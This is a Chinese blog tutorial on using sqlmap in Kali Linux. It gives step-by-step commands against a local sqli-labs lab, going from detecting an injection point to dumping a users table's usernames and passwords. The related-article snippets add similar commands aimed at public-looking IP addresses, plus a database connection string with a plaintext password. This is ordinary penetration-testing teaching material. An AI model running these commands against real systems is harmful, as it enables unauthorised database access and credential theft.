kali-sqlMap使用技巧

最新推荐文章于 2023-12-01 12:12:32 发布
最新推荐文章于 2023-12-01 12:12:32 发布
阅读量723 收藏 8
点赞数 1
分类专栏: 网络安全学习 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HKkkkkSky/article/details/126960366
版权 
什么是sql注入?
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。
SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。


sql注入的危害?
SQL 注入会带来很多危害,包括但不限于:
骗过登录校验,查看用户登录后的详细信息(例如发布的评论、购买的商品、邮寄地址等),
这是 SQL 注入的最简单形式;
更新、删除和插入记录,破坏数据库中的数据;
在服务器上执行命令,该命令可以下载和安装木马等恶意程序;
将有价值的用户数据(例如邮箱、密码、信用卡等)导出到攻击者的远程计算机

测试地址: http://192.168.1.7/sqli-labs/Less-2/?id=2

sqlmap -h         获取帮助
sqlmap -u "url"   检测注入点

--dbs             列出所有数据库的名字
--current-db      列出当前数据库的名字
-D                指定一个数据库
--tables          列出表名
-T                指定表名
--columns         列出所有的字段名
-C                指定字段
--dump            列出字段内容

sqlmap -h 获取帮助

sqlmap -h 获取帮助

在这里插入图片描述

检测注入点

sqlmap -u “url” 检测注入点

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2”

在这里插入图片描述

列出所有数据库的名字

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” --dbs

在这里插入图片描述

列出当前数据库的名字

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” --current-db

在这里插入图片描述

指定一个数据库列出表名

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -D “security” --tables

在这里插入图片描述

指定表名列出字段名

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -T users --columns

在这里插入图片描述

指定字段列出字段内容

sqlmap -u “http://192.168.1.7/sqli-labs/Less-2/?id=2” -D “security” -T “users” -C “username,password” --dump

在这里插入图片描述

HKkkkkSky
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali工具sqlmap使用教程
qq_52805176的博客
07-13 3744
渗透测试工具sqlmap的简单使用
kali linux下sqlmap使用教程
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
SQLmap使用教程图文教程(超详细)
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap详细教程
简介
01-04 3172
SQLmqp教程!
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 5857
安全等级调为low进入SQL Injection(Blind)页面。
kali工具SQLmap基本使用方法流程以及命令解析
FRANXX_02的博客
10-06 5642
kali工具SQLmap基本使用方法流程以及命令解析
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1571
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
Kali Liunx使用SQLMap查找和利用SQL注入
yuan00005555的博客
11-14 445
开发SQL注入是一个非常辛苦的过程。SQLMapKaliLinux 中包含的命令行工具,它可以帮助我们使用多种技术对各种数据库自动检测和利用sQL注入。在这小节中,我们将使用SQLMap来检测和利用SQL漏洞,并获取应用程序的用户名和密码。
kali工具使用sqlmap教程
J546283791的博客
10-25 252
首先kali自带sqlmap:尝试一下sqlilab第一关:结果:尝试查询数据库:出现:尝试查询security下的所有表:结果:尝试查users下的所有字段:结果尝试爆破各字段所有条目:
sqlmap注入实战教程(图文详解)
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
sqlmap使用
li2495735120的博客
06-16 270
首先我们要使用的工具是VMware、centos7、kali-Linux基于工具VMware安装centos7、kali-linux。在centos7中搭建LAMP。接着基于LAMP搭建DVWA的环境。
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库MySql、Oracle、Access、PostageSQLSQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
Sqlmap的基础使用
Dreamsi_zhang的博客
07-28 258
sqlmap使用方法: 测试环境为Kali2021自带的sqlmap工具,目标为靶场环境。 1、获取后台所有库 sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ --dbs 执行效果如下:已成功获取到所有库名 2、获取对应库中的表 sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms --tables 执行效果如下所示:已成功获取到指定库的所有表信息 3、获取对应库以
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
kali2.0 更新sqlmap
qq_25494727的博客
04-17 1万+
更新命令为:sqlmap -update直接执行,是出错。解决方法: 找到sqlmap的路径/usr/share/salmap执行 cd /usr/share/然后删掉sqlmap   rm -rf sqlmap/然后执行 git clone https://github.com/sqlmapproject/sqlmap克隆到路径即可。...
如何在kali Linux中使用sqlmap工具
gaomei2009的专栏
06-20 1708
post请求中参数为 uname=admin*&passwd=test&submit=Submit。第一步:先判定kali Linux中sqlmap能够正常使用。在kali linux中,使用sqlmap,如上图。先遍历出数据库类型和所有的表。第二步:抓取某个页面的登陆数据包,如下。指定数据库表名sql10051008。
kali中的sqlmap使用
最新发布
yishuihanwyf的博客
12-01 830
kalisqlmap中的简单使用
kali+sqlmap使用教程
09-30
kali是一款功能强大的渗透测试操作系统,而sqlmapkali自带的一个用于自动化检测和利用SQL注入漏洞的工具。使用sqlmap可以帮助渗透测试人员快速发现并利用目标系统的SQL注入漏洞。 sqlmap的基本使用教程如下: 1. 首先,打开kali终端并输入sqlmap命令来启动工具。 2. 使用"-u"参数指定目标URL,例如:sqlmap -u http://example.com/page.php?id=1。 3. sqlmap将自动检测目标URL是否存在SQL注入漏洞,并提供相关报告。 4. 你可以使用"--dbs"参数来列出目标数据库的名称。 5. 使用"-D"参数指定目标数据库,例如:sqlmap -u http://example.com/page.php?id=1 -D dbname。 6. 使用"--tables"参数来列出目标数据库中的表格。 7. 使用"-T"参数指定目标表格,例如:sqlmap -u http://example.com/page.php?id=1 -D dbname -T tablename。 8. 你可以使用"--columns"参数来列出目标表格中的列。 9. 使用"-C"参数指定目标列,例如:sqlmap -u http://example.com/page.php?id=1 -D dbname -T tablename -C columnname。 10. sqlmap还提供了其他一些选项,可以根据具体需求来使用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HKkkkkSky

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值